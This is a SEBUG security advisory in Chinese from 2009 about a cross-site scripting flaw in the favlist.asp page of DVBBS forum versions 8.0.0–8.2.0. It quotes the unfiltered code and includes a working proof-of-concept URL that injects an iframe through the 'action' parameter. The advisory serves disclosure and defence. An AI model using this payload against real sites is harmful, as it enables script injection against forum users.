DVBBS 8.0.0-8.2.0
动网论坛(DVBBS)Favlist.asp页面过滤不严导致跨站漏洞
SEBUG-ID:11456
SEBUG-Appdir:动网(DVBBS)
Published:2009-05-27
Vulnerable:
Discription:
文件favlist.asp中:
Function ShowPage(CurrentPage,Pcount,totalrec,PageNum) //第227行
Dim SearchStr
SearchStr=Request("action")
……
ShowPage=Replace(ShowPage,"{$SearchStr}",SearchStr) //第236行
ShowPage=Replace(ShowPage,"{$redcolor}",Dvbbs.mainsetting(1))
程序没有对输出变量SearchStr过滤导致xss漏洞的产生。 <*References
Bug.Center.Team*>
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
http://www.target.com/favlist.asp?action=xxx');//-->%3C/script%3E<iframe%20src=http://www.baidu.com></iframe>
SEBUG Solution:
厂商补丁 DVBBS ---------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.dvbbs.net
// sebug.net [2009-05-28]